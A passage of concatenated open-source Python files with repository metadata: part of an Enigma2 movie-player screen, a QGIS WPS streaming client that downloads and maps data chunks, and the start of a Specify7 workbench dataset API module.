self.handleLeave(config.usage.on_movie_stop.value)
def leavePlayerOnExit(self):
if self.shown:
self.hide()
elif self.session.pipshown and "popup" in config.usage.pip_hideOnExit.value:
if config.usage.pip_hideOnExit.value == "popup":
self.session.openWithCallback(self.hidePipOnExitCallback, MessageBox, _("Disable Picture in Picture"), simple=True)
else:
self.hidePipOnExitCallback(True)
elif config.usage.leave_movieplayer_onExit.value == "popup":
self.session.openWithCallback(self.leavePlayerOnExitCallback, MessageBox, _("Exit movie player?"), simple=True)
elif config.usage.leave_movieplayer_onExit.value == "without popup":
self.leavePlayerOnExitCallback(True)
elif config.usage.leave_movieplayer_onExit.value == "stop":
self.leavePlayer()
def leavePlayerOnExitCallback(self, answer):
if answer:
setResumePoint(self.session)
self.handleLeave("quit")
def hidePipOnExitCallback(self, answer):
if answer:
self.showPiP()
def deleteConfirmed(self, answer):
if answer:
self.leavePlayerConfirmed((True, "quitanddeleteconfirmed"))
def deleteAndMovielistConfirmed(self, answer):
if answer:
self.leavePlayerConfirmed((True, "deleteandmovielistconfirmed"))
def movielistAgain(self):
from Screens.MovieSelection import playlist
del playlist[:]
self.session.nav.playService(self.lastservice)
self.leavePlayerConfirmed((True, "movielist"))
def leavePlayerConfirmed(self, answer):
answer = answer and answer[1]
if answer is None:
return
if answer in ("quitanddelete", "quitanddeleteconfirmed", "deleteandmovielist", "deleteandmovielistconfirmed"):
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
serviceHandler = enigma.eServiceCenter.getInstance()
if answer in ("quitanddelete", "deleteandmovielist"):
msg = ''
if config.usage.movielist_trashcan.value:
import Tools.Trashcan
try:
trash = Tools.Trashcan.createTrashFolder(ref.getPath())
Screens.MovieSelection.moveServiceFiles(ref, trash)
# Moved to trash, okay
if answer == "quitanddelete":
self.close()
else:
self.movielistAgain()
return
except Exception, e:
print "[InfoBar] Failed to move to .Trash folder:", e
msg = _("Cannot move to trash can") + "\n" + str(e) + "\n"
info = serviceHandler.info(ref)
name = info and info.getName(ref) or _("this recording")
msg += _("Do you really want to delete %s?") % name
if answer == "quitanddelete":
self.session.openWithCallback(self.deleteConfirmed, MessageBox, msg)
elif answer == "deleteandmovielist":
self.session.openWithCallback(self.deleteAndMovielistConfirmed, MessageBox, msg)
return
elif answer in ("quitanddeleteconfirmed", "deleteandmovielistconfirmed"):
offline = serviceHandler.offlineOperations(ref)
if offline.deleteFromDisk(0):
self.session.openWithCallback(self.close, MessageBox, _("You cannot delete this!"), MessageBox.TYPE_ERROR)
if answer == "deleteandmovielistconfirmed":
self.movielistAgain()
return
if answer in ("quit", "quitanddeleteconfirmed"):
self.close()
elif answer in ("movielist", "deleteandmovielistconfirmed"):
if config.movielist.stop_service.value:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
else:
ref = self.lastservice
self.returning = True
self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, ref)
self.session.nav.stopService()
if not config.movielist.stop_service.value:
self.session.nav.playService(self.lastservice)
elif answer == "restart":
self.doSeek(0)
self.setSeekState(self.SEEK_STATE_PLAY)
elif answer in ("playlist","playlistquit","loop"):
( next_service, item , length ) = self.getPlaylistServiceInfo(self.cur_service)
if next_service is not None:
if config.usage.next_movie_msg.value:
self.displayPlayedName(next_service, item, length)
self.session.nav.playService(next_service)
self.cur_service = next_service
else:
if answer == "playlist":
self.leavePlayerConfirmed([True,"movielist"])
elif answer == "loop" and length > 0:
self.leavePlayerConfirmed([True,"loop"])
else:
self.leavePlayerConfirmed([True,"quit"])
elif answer in "repeatcurrent":
if config.usage.next_movie_msg.value:
(item, length) = self.getPlaylistServiceInfo(self.cur_service)
self.displayPlayedName(self.cur_service, item, length)
self.session.nav.stopService()
self.session.nav.playService(self.cur_service)
def doEofInternal(self, playing):
if not self.execing:
return
if not playing :
return
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref:
delResumePoint(ref)
self.handleLeave(config.usage.on_movie_eof.value)
def up(self):
slist = self.servicelist
if slist and slist.dopipzap:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
slist.moveUp()
self.session.execDialog(slist)
else:
self.showMovies()
def down(self):
slist = self.servicelist
if slist and slist.dopipzap:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
slist.moveDown()
self.session.execDialog(slist)
else:
self.showMovies()
def right(self):
# XXX: gross hack, we do not really seek if changing channel in pip :-)
slist = self.servicelist
if slist and slist.dopipzap:
# XXX: We replicate InfoBarChannelSelection.zapDown here - we shouldn't do that
if slist.inBouquet():
prev = slist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and slist.atEnd():
slist.nextBouquet()
else:
slist.moveDown()
cur = slist.getCurrentSelection()
if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
break
else:
slist.moveDown()
slist.zap(enable_pipzap = True)
else:
InfoBarSeek.seekFwd(self)
def left(self):
slist = self.servicelist
if slist and slist.dopipzap:
# XXX: We replicate InfoBarChannelSelection.zapUp here - we shouldn't do that
if slist.inBouquet():
prev = slist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value:
if slist.atBegin():
slist.prevBouquet()
slist.moveUp()
cur = slist.getCurrentSelection()
if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
break
else:
slist.moveUp()
slist.zap(enable_pipzap = True)
else:
InfoBarSeek.seekBack(self)
def showPiP(self):
slist = self.servicelist
if self.session.pipshown:
if slist and slist.dopipzap:
slist.togglePipzap()
if self.session.pipshown:
del self.session.pip
self.session.pipshown = False
else:
service = self.session.nav.getCurrentService()
info = service and service.info()
xres = str(info.getInfo(enigma.iServiceInformation.sVideoWidth))
if int(xres) <= 720 or not getMachineBuild() == 'blackbox7405':
from Screens.PictureInPicture import PictureInPicture
self.session.pip = self.session.instantiateDialog(PictureInPicture)
self.session.pip.show()
if self.session.pip.playService(slist.getCurrentSelection()):
self.session.pipshown = True
self.session.pip.servicePath = slist.getCurrentServicePath()
else:
self.session.pipshown = False
del self.session.pip
else:
self.session.open(MessageBox, _("Your %s %s does not support PiP HD") % (getMachineBrand(), getMachineName()), type = MessageBox.TYPE_INFO,timeout = 5 )
def movePiP(self):
if self.session.pipshown:
InfoBarPiP.movePiP(self)
def swapPiP(self):
pass
def showMovies(self):
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref and ':0:/' not in ref.toString():
self.playingservice = ref # movie list may change the currently playing
else:
self.playingservice = enigma.eServiceReference(config.movielist.curentlyplayingservice.value)
self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, ref)
def movieSelected(self, service):
if service is not None:
self.cur_service = service
self.is_closing = False
self.session.nav.playService(service)
self.returning = False
elif self.returning:
self.close()
else:
self.is_closing = False
try:
ref = self.playingservice
del self.playingservice
# no selection? Continue where we left off
if ref and not self.session.nav.getCurrentlyPlayingServiceOrGroup():
self.session.nav.playService(ref)
except:
pass
def getPlaylistServiceInfo(self, service):
from MovieSelection import playlist
for i, item in enumerate(playlist):
if item == service:
if config.usage.on_movie_eof.value == "repeatcurrent":
return i+1, len(playlist)
i += 1
if i < len(playlist):
return playlist[i], i+1, len(playlist)
elif config.usage.on_movie_eof.value == "loop":
return playlist[0], 1, len(playlist)
return None, 0, 0
def displayPlayedName(self, ref, index, n):
from Tools import Notifications
Notifications.AddPopup(text = _("%s/%s: %s") % (index, n, self.ref2HumanName(ref)), type = MessageBox.TYPE_INFO, timeout = 5)
def ref2HumanName(self, ref):
return enigma.eServiceCenter.getInstance().info(ref).getName(ref)
| formiano/enigma2 | lib/python/Screens/InfoBar.py | Python | gpl-2.0 | 33,112 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Client for streaming based WPS.
It exploits asynchronous capabilities of WPS and QGIS for visualizing
intermediate results from a WPS
-------------------
copyright : (C) 2012 by Germán Carrillo (GeoTux)
email : geotux_tuxman@linuxmail.org
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt4.QtCore import *
from PyQt4.QtGui import QColor, QMessageBox
from PyQt4.QtNetwork import QNetworkRequest, QNetworkAccessManager
from qgis.core import (QgsNetworkAccessManager, QgsVectorLayer, QgsRasterLayer,
QgsMapLayerRegistry, QgsFeature, QgsGeometry)
from qgis.gui import QgsRubberBand, QgsVertexMarker
from wpslib.processdescription import getFileExtension,isMimeTypeVector,isMimeTypeRaster
from wpslib.executionresult import decodeBase64
from functools import partial
import apicompat
import tempfile
import os, platform
import glob
class Streaming(QObject):
""" Class for keeping track of stream chunks and
providing methods for handling and visualizing them
"""
# Define SIGNALS/SLOTS
playlistHandled = pyqtSignal(dict)
urlReady = pyqtSignal(str, int, str)
dataReady = pyqtSignal(str, int)
def __init__(self, parent, iface, chunks, playlistUrl, mimeType, encoding):
super(Streaming, self).__init__()
self.DEBUG = True
# Variables from other classes
self.parent = parent # For GUI access
self.iface = iface
self.chunks = chunks
self.playlistUrl = playlistUrl
self.mimeType = mimeType
self.encoding = encoding
# Internal variables
self.__endTag = "#PLAYLIST-END"
self.__exceptionTag = "#EXCEPTION"
self.__exceptionUrl = ""
self.__exceptionFound = False
self.__playlistFinished = False # Did the end tag appeared?
self.__bytesInlastReply = 0 # To compare last and current reply sizes
self.__loadedChunks = 0 # For keeping track of # of loaded (to local vars) chunks
self.__deliveredChunks = 0 # For keeping track of # of loaded (to the map) chunks
self.__bFirstChunk = True
self.__features = {} # {0:[f0,f1,f2], 1:[f0,f1]}
self.__bGeomMulti = False # Is the geometry multi{point|line|polygon}
self.__geometryType = "" # Values: "Point","LineString","Polygon","Unknown", "NoGeometry"
self.__tmpGeometry = {} # For visualization purposes {chunkId1: rb1, chunkId2: rb2 }
self.__memoryLayer = None # The whole merged data
# For rasters only
self.__legend = self.iface.legendInterface()
self.__groupIndex = 0
self.__chunksDir = None
self.__virtualFile = "" # Virtual raster file path
if isMimeTypeRaster(self.mimeType, True) != None:
self.__chunksDir = tempfile.mkdtemp(prefix="tmpChunks")
# Other objects
self.timer = QTimer()
self.timer.setInterval(1 * 1000) # 1 second
self.QNAM4Playlist = QNetworkAccessManager()
self.QNAM4Chunks = QNetworkAccessManager()
self.QNAM4Exception = QNetworkAccessManager()
# SIGNAL/SLOT connections
self.playlistHandled.connect(self.fetchChunks)
self.urlReady.connect(self.fetchResult)
self.dataReady.connect(self.loadData)
self.timer.timeout.connect(partial(self.fetchPlaylist, self.playlistUrl))
self.QNAM4Playlist.finished.connect(self.handlePlaylist)
self.QNAM4Chunks.finished.connect(self.handleChunk)
self.QNAM4Exception.finished.connect(self.handleException)
#self.QNAM4Playlist = QgsNetworkAccessManager.instance()
#theReply2.error.connect(self.handleErrors)
# GUI
self.parent.progressBar.setRange(0,0)
self.parent.lblProcess.setText("Reading output playlist...")
def start(self):
""" Start fetching """
self.fetchPlaylist(self.playlistUrl) # First call
def stop(self):
""" Stop fetching """
self.timer.stop()
self.QNAM4Playlist.finished.disconnect(self.handlePlaylist)
self.QNAM4Chunks.finished.disconnect(self.handleChunk)
self.removeTempGeometry(self.__geometryType)
if self.DEBUG: print "Stop streaming!"
def validateCompletedStream(self):
""" Is the stream complete (Did the end tag appeared?) """
#return (self.__loadedChunks >= self.chunks and self.chunks != 0)
return self.__playlistFinished
def allChunksDelivered(self):
""" Are all chunks already loaded into the map? """
return ((self.__loadedChunks == self.__deliveredChunks and
self.__playlistFinished) or self.__exceptionFound)
def fetchPlaylist(self, playlistLink):
url = QUrl(playlistLink)
self.QNAM4Playlist.get(QNetworkRequest(url)) # SLOT: handlePlaylist
def handlePlaylist(self, reply):
""" Parse the chunk URLs and update the loadedChunks counter """
# Check if there is redirection
reDir = reply.attribute(QNetworkRequest.RedirectionTargetAttribute).toUrl()
if not reDir.isEmpty():
self.fetchPlaylist(reDir.toString())
return
# Parse URLs only if there is new data in the reply
if reply.bytesAvailable() > self.__bytesInlastReply:
if self.DEBUG: print " Parsing the playlist..."
startFrom = reply.bytesAvailable() - self.__bytesInlastReply # Delta in bytes
self.__bytesInlastReply = reply.bytesAvailable()
newURLs = self.parseURLs(reply, startFrom)
else:
if self.DEBUG: print " No new data in the playlist..."
newURLs = {}
# Store new URLs
if len(newURLs) > 0:
self.__loadedChunks += len(newURLs)
if self.chunks:
self.parent.progressBar.setRange(0,self.chunks)
if self.DEBUG: print str(self.__loadedChunks) + " chunks loaded" + ((" out of " + str(self.chunks)) if self.chunks else "")
# If not complete, make additional calls
if not self.validateCompletedStream():
if not self.timer.isActive():
self.timer.start()
if self.DEBUG: print "Timer started..."
else:
self.timer.stop()
self.QNAM4Playlist.finished.disconnect(self.handlePlaylist)
if self.DEBUG: print "Playlist finished!"
if self.allChunksDelivered():
self.finishLoading()
if self.__exceptionFound:
self.fetchException()
if len(newURLs) > 0:
self.playlistHandled.emit(newURLs) # SLOT: fetchChunks
def parseURLs(self, reply, startFrom):
""" Get a dict of new IDs:URLs from the current playlist (newURLs) """
newURLs = {} # {0:URL0, 1:URL1, ...}
count = 0
#Get the delta and start reading it
allData = reply.readAll()
allData = allData.right(startFrom) # Get rid of old data
response = QTextStream(allData, QIODevice.ReadOnly)
data = response.readLine()
# Parse
while (data):
data = str(data.split("\n")[0])
if data:
if "#" in data: # It's a playlist comment
if self.__endTag in data:
self.__playlistFinished = True
elif self.__exceptionTag in data:
if self.DEBUG: print "Exception found!"
self.__exceptionFound = True
self.__exceptionUrl = data.split(":",1)[1].strip()
else:
newURLs[count+self.__loadedChunks] = data
count += 1
data = response.readLine()
return newURLs
def fetchChunks(self, newURLs):
""" Fetch each url """
for chunkId in newURLs:
self.urlReady.emit(self.encoding, chunkId, newURLs[chunkId]) # SLOT: fetchResult
def fetchResult(self, encoding, chunkId, fileLink):
""" Send the GET request """
url = QUrl(fileLink)
theReply2 = self.QNAM4Chunks.get(QNetworkRequest(url))
theReply2.setProperty("chunkId", pystring(chunkId))
theReply2.setProperty("encoding", pystring(encoding))
def handleErrors(self, error): # TODO connect it
if self.DEBUG: print "ERROR!!!", error
def fetchException(self):
""" Send the GET request for the exception """
url = QUrl(self.__exceptionUrl)
theReply3 = self.QNAM4Exception.get(QNetworkRequest(url))
def handleException(self, reply):
""" Display the exception """
# Check if there is redirection
reDir = reply.attribute(QNetworkRequest.RedirectionTargetAttribute).toUrl()
if not reDir.isEmpty():
self.__exceptionUrl = reDir.toString()
self.fetchException()
return
resultXML = reply.readAll().data()
self.parent.setStatusLabel('error')
self.parent.progressBar.setMinimum(0)
self.parent.progressBar.setMaximum(100)
self.parent.errorHandler(resultXML)
def handleChunk(self, reply):
""" Store the file received """
#reply.deleteLater() # Recommended way to delete the reply
chunkId = reply.property("chunkId").toInt()[0]
encoding = reply.property("encoding").toString()
# Check if there is redirection
reDir = reply.attribute(QNetworkRequest.RedirectionTargetAttribute).toUrl()
if not reDir.isEmpty():
self.urlReady.emit(encoding, chunkId, reDir.toString())
return
if self.DEBUG: print "GET chunk", chunkId
# Update progressBar
if self.chunks:
self.parent.progressBar.setValue(self.__deliveredChunks + 1)
self.parent.lblProcess.setText("Downloading chunks... ("+str(self.__deliveredChunks + 1)+"/"+str(self.chunks)+")")
# Get a unique temporary file name
tmpFile = tempfile.NamedTemporaryFile(prefix="base64",
suffix=getFileExtension(self.mimeType), dir=self.__chunksDir, delete=False )
# TODO: Check if the file name already exists!!!
# Write the data to the temporary file
outFile = QFile(tmpFile.name)
outFile.open(QIODevice.WriteOnly)
outFile.write(reply.readAll())
outFile.close()
# Decode?
if encoding == "base64":
resultFile = decodeBase64(tmpFile.name, self.mimeType, self.__chunksDir)
else:
resultFile = tmpFile.name
# Finally, load the data
if self.DEBUG: print "READY to be loaded (", resultFile, ", chunkId:", chunkId, ")"
self.dataReady.emit(resultFile, chunkId) # SLOT: loadData
def loadData(self, resultFile, chunkId):
""" Load data to the map """
if isMimeTypeVector(self.mimeType, True) != None:
# Memory layer:
geometryTypes = ["Point","LineString","Polygon","Unknown", "NoGeometry"]
vlayer = QgsVectorLayer(resultFile, "chunk", "ogr")
if self.__bFirstChunk:
self.__bFirstChunk = False
self.__geometryType = geometryTypes[vlayer.geometryType()]
self.__bGeomMulti = vlayer.wkbType() in [4,5,6,11,12,13]
self.__memoryLayer = QgsVectorLayer(self.__geometryType,"Streamed data","memory")
self.__memoryLayer.dataProvider().addAttributes(vlayer.pendingFields().values())
self.__memoryLayer.updateFieldMap()
provider = vlayer.dataProvider()
allAttrs = provider.attributeIndexes()
vlayer.select(allAttrs)
# Visualize temporal geometries during the downloading process
# Don't add temporal geometries if last chunk
if self.DEBUG: print "Loaded chunkId:",chunkId
res = self.__memoryLayer.dataProvider().addFeatures( [feat for feat in vlayer] )
self.__deliveredChunks += 1
if not self.allChunksDelivered():
inFeat = QgsFeature()
inGeom = QgsGeometry()
self.createTempGeometry(chunkId, self.__geometryType)
while provider.nextFeature( inFeat ):
inGeom = inFeat.geometry()
featList = self.extractAsSingle(self.__geometryType, inGeom) if self.__bGeomMulti else [inGeom]
for geom in featList:
self.addTempGeometry(chunkId, self.__geometryType, geom)
else:
self.finishLoading()
# Raster data
elif isMimeTypeRaster(self.mimeType, True) != None:
# We can directly attach the new layer
if self.__bFirstChunk:
self.__bFirstChunk = False
self.__groupIndex = self.__legend.addGroup("Streamed-raster")
rLayer = QgsRasterLayer(resultFile, "raster_"+str(chunkId))
bLoaded = QgsMapLayerRegistry.instance().addMapLayer(rLayer)
self.stretchRaster(rLayer)
self.__legend.moveLayer(rLayer, self.__groupIndex + 1)
self.__deliveredChunks += 1
if self.allChunksDelivered():
self.finishLoading()
def finishLoading(self):
""" Finish the loading process, load the definite assembled layer """
if self.DEBUG: print "DONE!"
if not self.__bFirstChunk:
if isMimeTypeVector(self.mimeType, True) != None:
self.removeTempGeometry(self.__geometryType)
QgsMapLayerRegistry.instance().addMapLayer(self.__memoryLayer)
elif isMimeTypeRaster(self.mimeType, True) != None:
self.parent.lblProcess.setText("All tiles are loaded. Merging them...")
# Generate gdal virtual raster
# Code adapted from GdalTools (C) 2009 by L. Masini and G. Sucameli (Faunalia)
self.process = QProcess(self)
self.connect(self.process, SIGNAL("finished(int, QProcess::ExitStatus)"),
self.loadVirtualRaster)
#self.setProcessEnvironment(self.process) Required in Windows?
cmd = "gdalbuildvrt"
arguments = pystringlist()
if platform.system() == "Windows" and cmd[-3:] == ".py":
command = cmd[:-3] + ".bat"
else:
command = cmd
tmpFile = tempfile.NamedTemporaryFile(prefix="virtual",
suffix=".vrt")
self.__virtualFile = tmpFile.name
arguments.append(self.__virtualFile)
rasters = self.getRasterFiles(self.__chunksDir,
getFileExtension(self.mimeType))
for raster in rasters:
arguments.append(raster)
self.process.start(command, arguments, QIODevice.ReadOnly)
if not self.__exceptionFound:
self.parent.setStatusLabel('finished')
self.parent.progressBar.setRange(0,100)
self.parent.progressBar.setValue(100)
def createTempGeometry(self, chunkId, geometryType):
""" Create rubber bands for rapid visualization of geometries """
if geometryType == "Polygon":
self.__tmpGeometry[chunkId] = QgsRubberBand(self.iface.mapCanvas(), True)
self.__tmpGeometry[chunkId].setColor( QColor( 0,255,0,255 ) )
self.__tmpGeometry[chunkId].setWidth( 2 )
if self.DEBUG: print "rubberBand created"
elif geometryType == "LineString":
self.__tmpGeometry[chunkId] = QgsRubberBand(self.iface.mapCanvas(), False)
self.__tmpGeometry[chunkId].setColor( QColor( 255,121,48,255 ) )
self.__tmpGeometry[chunkId].setWidth( 3 )
elif geometryType == "Point":
# In the case of points, they will be added as vertex objects later
self.__tmpGeometry[chunkId] = []
def addTempGeometry(self, chunkId, geometryType, geometry):
""" Add geometries as rubber bands or vertex objects """
if geometryType == "Polygon" or geometryType == "LineString":
self.__tmpGeometry[chunkId].addGeometry(geometry, None)
elif geometryType == "Point":
vertex = QgsVertexMarker(self.iface.mapCanvas())
vertex.setCenter(geometry.asPoint())
vertex.setColor(QColor(0,255,0))
vertex.setIconSize(6)
vertex.setIconType(QgsVertexMarker.ICON_BOX) # or ICON_CROSS, ICON_X
vertex.setPenWidth(3)
self.__tmpGeometry[chunkId].append(vertex)
def removeTempGeometry(self, geometryType):
""" Remove rubber bands or vertex objects from the map """
if geometryType == "Polygon" or geometryType == "LineString":
for chunkId in self.__tmpGeometry.keys():
self.iface.mapCanvas().scene().removeItem(self.__tmpGeometry[chunkId])
del self.__tmpGeometry[chunkId]
elif geometryType == "Point":
for chunkId in self.__tmpGeometry.keys():
if len( self.__tmpGeometry[chunkId] ) > 0:
for vertex in self.__tmpGeometry[chunkId]:
self.iface.mapCanvas().scene().removeItem(vertex)
del vertex
def extractAsSingle(self, geometryType, geom):
""" Extract multi geometries as single ones.
Required because of a QGIS bug regarding multipolygons and rubber bands
"""
# Code adapted from QGIS fTools plugin, (C) 2008-2011 Carson Farmer
multi_geom = QgsGeometry()
temp_geom = []
if geometryType == "Point":
multi_geom = geom.asMultiPoint()
for i in multi_geom:
temp_geom.append( QgsGeometry().fromPoint ( i ) )
elif geometryType == "LineString":
multi_geom = geom.asMultiPolyline()
for i in multi_geom:
temp_geom.append( QgsGeometry().fromPolyline( i ) )
elif geometryType == "Polygon":
multi_geom = geom.asMultiPolygon()
for i in multi_geom:
temp_geom.append( QgsGeometry().fromPolygon( i ) )
return temp_geom
def loadVirtualRaster(self, exitCode, status):
""" Load a virtual raster to QGIS """
if exitCode == 0:
self.__legend.setGroupVisible( self.__groupIndex, False )
rLayer = QgsRasterLayer(self.__virtualFile, "virtual")
bLoaded = QgsMapLayerRegistry.instance().addMapLayer(rLayer)
self.stretchRaster(rLayer)
self.process.kill()
def stretchRaster(self, raster):
raster.setMinimumMaximumUsingLastExtent()
raster.setContrastEnhancementAlgorithm(1)
raster.triggerRepaint()
def setProcessEnvironment(self, process):
""" From GdalTools. Set environment variables for running gdalbuildvrt """
envvar_list = {
"PATH" : self.getGdalBinPath(),
"PYTHONPATH" : self.getGdalPymodPath()
}
if self.DEBUG: print envvar_list
sep = os.pathsep
for name, val in envvar_list.iteritems():
if val == None or val == "":
continue
envval = os.getenv(name)
if envval == None or envval == "":
envval = str(val)
elif not pystring( envval ).split( sep ).contains( val, Qt.CaseInsensitive ):
envval += "%s%s" % (sep, str(val))
else:
envval = None
if envval != None:
os.putenv( name, envval )
if False: # not needed because os.putenv() has already updated the environment for new child processes
env = QProcess.systemEnvironment()
if env.contains( QRegExp( "^%s=(.*)" % name, Qt.CaseInsensitive ) ):
env.replaceInStrings( QRegExp( "^%s=(.*)" % name, Qt.CaseInsensitive ), "%s=\\1%s%s" % (name, sep, gdalPath) )
else:
env << "%s=%s" % (name, val)
process.setEnvironment( env )
def getRasterFiles(self, dir, extension):
rasters = pystringlist()
for name in glob.glob(dir + '/*' + extension):
rasters.append(name)
return rasters
def getGdalBinPath(self):
""" Retrieves GDAL binaries location """
settings = QSettings()
return settings.value( "/GdalTools/gdalPath", pystring( "" ) ).toString()
def getGdalPymodPath(self):
""" Retrieves GDAL python modules location """
settings = QSettings()
return settings.value( "/GdalTools/gdalPymodPath", pystring( "" ) ).toString()
| GeoLabs/QgsWPSClient | streaming.py | Python | gpl-2.0 | 22,331 |
import json
import logging
from typing import List, Optional
from uuid import uuid4
from django import http
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.db import transaction
from django.db.utils import OperationalError
from django.views.decorators.http import require_GET, require_POST, \
require_http_methods
from jsonschema import validate # type: ignore
from jsonschema.exceptions import ValidationError # type: ignore
from specifyweb.specify.api import create_obj, get_object_or_404, obj_to_data, \
toJson, uri_for_model
from specifyweb.specify.views import apply_access_control, login_maybe_required, \
openapi
from specifyweb.specify import models as specify_models
from ..notifications.models import Message
from . import models, tasks
from .upload import upload as uploader, upload_plan_schema
logger = logging.getLogger(__name__)
def regularize_rows(ncols: int, rows: List[List]) -> List[List[str]]:
n = ncols + 1 # extra row info such as disambiguation in hidden col at end
def regularize(row: List) -> Optional[List]:
data = (row + ['']*n)[:n] # pad / trim row length to match columns
cleaned = ['' if v is None else str(v).strip() for v in data] # convert values to strings
return None if all(v == '' for v in cleaned[0:ncols]) else cleaned # skip empty rows
return [r for r in map(regularize, rows) if r is not None]
open_api_components = {
'schemas': {
'wb_uploadresult': {
"oneOf": [
{
"type": "string",
"example": "null"
},
{
"type": "object",
"properties": {
"success": {
"type": "boolean",
},
"timestamp": {
"type": "string",
"format": "datetime",
"example": "2021-04-28T22:28:20.033117+00:00",
}
}
}
]
},
"wb_uploaderstatus": {
"oneOf": [
{
"type": "string",
"example": "null",
"description": "Nothing to report"
}, {
"type": "object",
"properties": {
"taskinfo": {
"type": "object",
"properties": {
"current": {
"type": "number",
"example": 4,
},
"total": {
"type": "number",
"example": 20,
}
}
},
"taskstatus": {
"type": "string",
"enum": [
"PROGRESS",
"PENDING",
"FAILURE",
]
},
"uploaderstatus": {
"type": "object",
"properties": {
"operation": {
"type": "string",
"enum": [
'validating',
'uploading',
'unuploading'
]
},
"taskid": {
"type": "string",
"maxLength": 36,
"example": "7d34dbb2-6e57-4c4b-9546-1fe7bec1acca",
}
}
},
},
"description": "Status of the " +
"upload / un-upload / validation process",
}
]
},
"wb_rows": {
"type": "array",
"items": {
"type": "array",
"items": {
"type": "string",
"description": "Cell's value or null"
}
},
"description": "2D array of values",
},
"wb_visualorder": {
"oneOf": [
{
"type": "string",
"description": "null",
},
{
"type": "array",
"items": {
"type": "number",
},
"description": "The order to show columns in",
}
]
},
"wb_uploadplan": {
"type": "object",
"properties": {
},
"description": "Upload Plan. Schema - " +
"https://github.com/specify/specify7/blob/5fb51a7d25d549248505aec141ae7f7cdc83e414/specifyweb/workbench/upload/upload_plan_schema.py#L14"
},
"wb_validation_results": {
"type": "object",
"properties": {},
"description": "Schema: " +
"https://github.com/specify/specify7/blob/19ebde3d86ef4276799feb63acec275ebde9b2f4/specifyweb/workbench/upload/validation_schema.py",
},
"wb_upload_results": {
"type": "object",
"properties": {},
"description": "Schema: " +
"https://github.com/specify/specify7/blob/19ebde3d86ef4276799feb63acec275ebde9b2f4/specifyweb/workbench/upload/upload_results_schema.py",
}
}
}
@openapi(schema={
"get": {
"parameters": [
{
"name": "with_plan",
"in": "query",
"required": False,
"schema": {
"type": "string"
},
"description": "If parameter is present, limit results to data sets with upload plans."
}
],
"responses": {
"200": {
"description": "Data fetched successfully",
"content": {
"application/json": {
"schema": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {
"type": "number",
"minimum": 0,
"description": "Data Set ID",
},
"name": {
"type": "string",
"description": "Data Set Name",
},
"uploadresult": {
"$ref": "#/components/schemas/wb_uploadresult"
},
"uploaderstatus": {
"$ref": "#/components/schemas/wb_uploaderstatus",
},
"timestampcreated": {
"type": "string",
"format": "datetime",
"example": "2021-04-28T13:16:07.774"
},
"timestampmodified": {
"type": "string",
"format": "datetime",
"example": "2021-04-28T13:50:41.710",
}
},
'required': ['id', 'name', 'uploadresult', 'uploaderstatus', 'timestampcreated', 'timestampmodified'],
'additionalProperties': False
}
}
}
}
}
}
},
'post': {
"requestBody": {
"required": True,
"description": "A JSON representation of a new Data Set",
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"name": {
"type": "string",
"description": "Data Set name",
},
"columns": {
"type": "array",
"items": {
"type": "string",
"description": "A name of the column",
},
"description": "A unique array of strings",
},
"rows": {
"$ref": "#/components/schemas/wb_rows",
},
"importedfilename": {
"type": "string",
"description": "The name of the original file",
}
},
'required': ['name', 'columns', 'rows', 'importedfilename'],
'additionalProperties': False
}
}
}
},
"responses": {
"201": {
"description": "Data created successfully",
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"id": {
"type": "number",
"description": "Data Set ID",
},
"name": {
"type": "string",
"description":
"Data Set name (may differ from the one " +
"in the request object as part of " +
"ensuring names are unique)"
},
},
'required': ['name', 'id'],
'additionalProperties': False
}
}
}
}
}
}
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_http_methods(["GET", "POST"])
@transaction.atomic
def datasets(request) -> http.HttpResponse:
"""RESTful list of user's WB datasets. POSTing will create a new dataset."""
if request.method == "POST":
data = json.load(request)
columns = data['columns']
if any(not isinstance(c, str) for c in columns) or not isinstance(columns, list):
return http.HttpResponse(f"all column headers must be strings: {columns}", status=400)
if len(set(columns)) != len(columns):
return http.HttpResponse(f"all column headers must be unique: {columns}", status=400)
rows = regularize_rows(len(columns), data['rows'])
ds = models.Spdataset.objects.create(
specifyuser=request.specify_user,
collection=request.specify_collection,
name=data['name'],
columns=columns,
data=rows,
importedfilename=data['importedfilename'],
createdbyagent=request.specify_user_agent,
modifiedbyagent=request.specify_user_agent,
)
return http.JsonResponse({"id": ds.id, "name": ds.name}, status=201)
else:
attrs = ('name', 'uploadresult', 'uploaderstatus', 'timestampcreated', 'timestampmodified')
dss = models.Spdataset.objects.filter(specifyuser=request.specify_user, collection=request.specify_collection).only(*attrs)
if 'with_plan' in request.GET:
dss = dss.filter(uploadplan__isnull=False)
return http.JsonResponse([{'id': ds.id, **{attr: getattr(ds, attr) for attr in attrs}} for ds in dss], safe=False)
@openapi(schema={
"get": {
"responses": {
"200": {
"description": "Successful response",
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"id": {
"type": "number",
"description": "Data Set ID",
},
"name": {
"type": "string",
"description": "Data Set name",
},
"columns": {
"type": "array",
"items": {
"type": "string",
"description": "A name of the column",
},
"description": "A unique array of strings",
},
"visualorder": {
"$ref": "#/components/schemas/wb_visualorder"
},
"rows": {
"$ref": "#/components/schemas/wb_rows"
},
"uploadplan": {
"$ref": "#/components/schemas/wb_uploadplan"
},
"uploadresult": {
